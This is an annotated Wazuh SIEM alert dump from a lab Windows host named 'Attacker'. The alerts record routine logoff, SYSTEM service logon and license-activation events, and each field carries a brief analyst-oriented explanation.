data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x1E7FC0D
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x1e7fc0d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.85865 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:51.9596326Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2363 Incremental log record number – handy for timeline order.
data.win.system.processID: 4720 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.88161 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:27.0631332Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43460 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10856 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Length of the session key generated at logon (e.g., 128‑bit); 0 means no session key was requested. Unexpectedly short keys can indicate a protocol downgrade.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.95498 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:56.4510372Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2365 Incremental log record number – handy for timeline order.
data.win.system.processID: 11828 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533885.97820 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:40.9838207Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43462 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533885.105153 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:26.3848083Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2367 Incremental log record number – handy for timeline order.
data.win.system.processID: 1172 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:26Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-21T01:40:26Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533886.106732 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:47:15.5376499Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2371 Incremental log record number – handy for timeline order.
data.win.system.processID: 1948 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-21T01:40:15Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-21T01:40:15Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533886.108311 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:38:27.9148683Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43468 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
